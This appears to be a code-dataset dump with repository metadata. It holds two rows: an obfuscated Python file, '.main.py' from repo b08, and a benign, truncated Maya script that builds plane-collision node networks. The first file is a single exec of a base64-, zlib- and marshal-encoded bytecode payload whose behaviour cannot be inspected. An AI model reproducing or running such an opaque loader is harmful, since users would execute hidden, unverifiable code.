] | 1 | 2020-10-15T08:29:01.000Z | 2020-10-15T08:29:01.000Z | from scipy_cut_tree_balanced.util import cut_tree_balanced | 58 | 58 | 0.931034 | 10 | 58 | 4.9 | 0.7 | 0.285714 | 0.612245 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051724 | 58 | 1 | 58 | 58 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
95df3ea0c18eeaea8c5248cddc73d45b72a62ebf | 10,632 | py | Python | .main.py | BotolMehedi/b08 | 340346cd6d082937cb8eccf8c06147c669529cfe | [
"MIT"
] | 30 | 2020-07-13T05:40:12.000Z | 2021-06-15T09:55:09.000Z | .main.py | Asim02/b08 | 340346cd6d082937cb8eccf8c06147c669529cfe | [
"MIT"
] | 2 | 2020-07-25T13:15:49.000Z | 2021-02-25T18:36:38.000Z | .main.py | Asim02/b08 | 340346cd6d082937cb8eccf8c06147c669529cfe | [
"MIT"
] | 15 | 2020-07-13T04:07:38.000Z | 2021-07-03T08:21:17.000Z | # Encrypt by Botol Baba
# Github : https://github.com/BotolMehedi
# Facebook : https://facebook.com/TheMehtan
# Youtube : https://youtube.com/MasterTrick1
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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")))) | 1,772 | 10,450 | 0.96661 | 301 | 10,632 | 34.142857 | 0.966777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143315 | 0.001787 | 10,632 | 6 | 10,450 | 1,772 | 0.825026 | 0.013732 | 0 | 0 | 0 | 0.5 | 0.991414 | 0.991414 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
252da500d496a6c719816f3adf16beb9dcaf7fea | 19,664 | py | Python | tools/collideTransform.py | fsanges/glTools | 8ff0899de43784a18bd4543285655e68e28fb5e5 | [
"MIT"
] | 165 | 2015-01-26T05:22:04.000Z | 2022-03-22T02:50:41.000Z | tools/collideTransform.py | qeeji/glTools | 8ff0899de43784a18bd4543285655e68e28fb5e5 | [
"MIT"
] | 5 | 2015-12-02T02:39:44.000Z | 2020-12-09T02:45:54.000Z | tools/collideTransform.py | qeeji/glTools | 8ff0899de43784a18bd4543285655e68e28fb5e5 | [
"MIT"
] | 83 | 2015-02-10T17:18:24.000Z | 2022-02-10T07:16:47.000Z | import maya.cmds as mc
import glTools.utils.stringUtils
import glTools.utils.surface
import glTools.utils.transform
def sphereCollideTransform():
pass
def cylinerCollideTransform():
pass
def planeCollideTransform( targetTransform,
collidePlane = None,
collideTransform = None,
offsetFalloff = None,
distanceFalloff = None,
distanceAxis = 'XY',
prefix = None ):
'''
Setup a plane collide transform.
Setup includes smooth offset falloff, distance falloff and collide weight attributes.
Collision is based on the +Z axis of the collide plane transform.
@param targetTransform: Target transform (or locator) that the collide transform will follow.
@type targetTransform: str
@param collidePlane: Collision plane transform. If None, creant new renderRect plane.
@type collidePlane: str or None
@param collideTransform: Collide transform that will collide with the plane. If None, creant new locator.
@type collideTransform: str or None
@param offsetFalloff: Calculate collision offset falloff. Offset falloff is calculated as collision local Z distance.
@type offsetFalloff: float or None
@param distanceFalloff: Calculate collision distance falloff. Distance falloff is calculated as collision local XY distance.
@type distanceFalloff: float or None
@param distanceAxis: Calculate collision distance falloff. Distance falloff is calculated as collision local XY distance.
@type distanceAxis: float or None
@param prefix: Naming prefix. If None, extracted from targetTransform
@type prefix: str or None
'''
# ==========
# - Checks -
# ==========
# Check Target Transforms
if not mc.objExists(targetTransform):
raise Exception('Target transform "'+targetTransform+'" does not exist!')
if not glTools.utils.transform.isTransform(targetTransform):
raise Exception('Object "'+targetTransform+'" is not a valid transform!')
# Check Collide Plane
if collidePlane:
if not mc.objExists(str(collidePlane)):
raise Exception('Collide plane "'+collidePlane+'" does not exist!')
if not glTools.utils.transform.isTransform(collidePlane):
raise Exception('Object "'+collidePlane+'" is not a valid transform!')
# Check Collide Transforms
if collideTransform:
if not mc.objExists(str(collideTransform)):
raise Exception('Collide transform "'+collideTransform+'" does not exist!')
if not glTools.utils.transform.isTransform(collideTransform):
raise Exception('Object "'+collideTransform+'" is not a valid transform!')
# Check Distance Axis
if distanceAxis: distanceAxis = distanceAxis.upper()
# Check Prefix
if not prefix: prefix = glTools.utils.stringUtils.stripSuffix(targetTransform)
# ===================
# - Build Collision -
# ===================
# Build Collide Objects
if not collideTransform:
collideTransform = mc.spaceLocator(n=prefix+'_collide_loc')[0]
if not collidePlane:
collidePlaneShape = mc.createNode('renderRect')
collidePlane = mc.listRelatives(collidePlaneShape,p=True)[0]
collidePlane = mc.rename(collidePlane,prefix+'_collide_plane')
# Add Collide Attributes
if not mc.attributeQuery('collideWeight',n=collidePlane,ex=True):
mc.addAttr(collidePlane,ln='collideWeight',min=0,max=1,dv=1,k=True)
# Build Collide Nodes
collideCondition = mc.createNode('condition',n=prefix+'_collide_condition')
collideBlend = mc.createNode('blendColors',n=prefix+'_collideWeight_blendColors')
worldToCollide = mc.createNode('vectorProduct',n=prefix+'_worldToCollide_vectorProduct')
mc.setAttr(worldToCollide+'.operation',4) # Point Matrix Product
collideToWorld = mc.createNode('vectorProduct',n=prefix+'_collideToWorld_vectorProduct')
mc.setAttr(collideToWorld+'.operation',4) # Point Matrix Product
worldToLocal = mc.createNode('vectorProduct',n=prefix+'_worldToLocal_vectorProduct')
mc.setAttr(worldToLocal+'.operation',4) # Point Matrix Product
# =========================
# - Build Collide Network -
# =========================
# World To Collide
mc.connectAttr(collidePlane+'.worldInverseMatrix[0]',worldToCollide+'.matrix',f=True)
if mc.objExists(targetTransform+'.worldPosition[0]'):
mc.connectAttr(targetTransform+'.worldPosition[0]',worldToCollide+'.input1',f=True)
else:
localToWorld = mc.createNode('vectorProduct',n=prefix+'_localToWorld_vectorProduct')
mc.setAttr(localToWorld+'.operation',4) # Point Matrix Product
mc.connectAttr(targetTransform+'.worldMatrix[0]',localToWorld+'.matrix',f=True)
mc.connectAttr(localToWorld+'.output',worldToCollide+'.input1',f=True)
# Collide Condition
mc.connectAttr(worldToCollide+'.outputZ',collideCondition+'.firstTerm',f=True)
mc.setAttr(collideCondition+'.secondTerm',0)
mc.setAttr(collideCondition+'.operation',2) # Greater Than
mc.connectAttr(worldToCollide+'.output',collideCondition+'.colorIfTrue',f=True)
mc.connectAttr(worldToCollide+'.outputX',collideCondition+'.colorIfFalseR',f=True)
mc.connectAttr(worldToCollide+'.outputY',collideCondition+'.colorIfFalseG',f=True)
mc.setAttr(collideCondition+'.colorIfFalseB',0)
# Collide Weight Blend
mc.connectAttr(collideCondition+'.outColor',collideBlend+'.color1',f=True)
mc.connectAttr(worldToCollide+'.output',collideBlend+'.color2',f=True)
mc.connectAttr(collidePlane+'.collideWeight',collideBlend+'.blender',f=True)
# Collide To World
mc.connectAttr(collideBlend+'.output',collideToWorld+'.input1',f=True)
mc.connectAttr(collidePlane+'.worldMatrix[0]',collideToWorld+'.matrix',f=True)
# World To Local
mc.connectAttr(collideToWorld+'.output',worldToLocal+'.input1',f=True)
mc.connectAttr(collideTransform+'.parentInverseMatrix[0]',worldToLocal+'.matrix',f=True)
# Connect Output
mc.connectAttr(worldToLocal+'.output',collideTransform+'.translate',f=True)
# ============================
# - Calculate Offset Falloff -
# ============================
if offsetFalloff != None:
# Add Collide Attributes
if not mc.attributeQuery('offsetFalloff',n=collidePlane,ex=True):
mc.addAttr(collidePlane,ln='offsetFalloff',min=0,dv=0.5,k=True)
# Build Nodes
falloffRemap = mc.createNode('remapValue',n=prefix+'_offsetFalloff_remapValue')
falloffMult = mc.createNode('multDoubleLinear',n=prefix+'_offsetFalloff_multDoubleLinear')
# Falloff Remap
mc.connectAttr(worldToCollide+'.outputZ',falloffRemap+'.inputValue',f=True)
mc.connectAttr(collidePlane+'.offsetFalloff',falloffRemap+'.inputMax',f=True)
mc.connectAttr(collidePlane+'.offsetFalloff',falloffRemap+'.outputMax',f=True)
mc.connectAttr(collidePlane+'.offsetFalloff',falloffMult+'.input1',f=True)
mc.setAttr(falloffMult+'.input2',-1)
mc.connectAttr(falloffMult+'.output',falloffRemap+'.inputMin',f=True)
# Override Collide Condition
mc.connectAttr(collidePlane+'.offsetFalloff',collideCondition+'.secondTerm',f=True)
mc.connectAttr(falloffRemap+'.outValue',collideCondition+'.colorIfFalseB',f=True)
# Set Offset Falloff
mc.setAttr(collidePlane+'.offsetFalloff',abs(offsetFalloff))
# ==============================
# - Calculate Distance Falloff -
# ==============================
if distanceFalloff != None:
# Add Collide Attributes
if not mc.attributeQuery('distanceFalloff',n=collidePlane,ex=True):
mc.addAttr(collidePlane,ln='distanceFalloff',min=0,dv=1,k=True)
# Distance Remap
distRemap = mc.createNode('remapValue',n=prefix+'_collideDist_remapValue')
mc.connectAttr(collidePlane+'.distanceFalloff',distRemap+'.inputMax',f=True)
mc.setAttr(distRemap+'.outputMin',1)
mc.setAttr(distRemap+'.outputMax',0)
mc.setAttr(distRemap+'.inputMin',0)
# Distance Falloff
collideDist = mc.createNode('distanceBetween',n=prefix+'_collideDist_distanceBetween')
if len(distanceAxis) == 1:
mc.connectAttr(worldToCollide+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
elif len(distanceAxis) == 2:
mc.connectAttr(worldToCollide+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
mc.connectAttr(worldToCollide+'.output'+distanceAxis[1],collideDist+'.point1Y',f=True)
else:
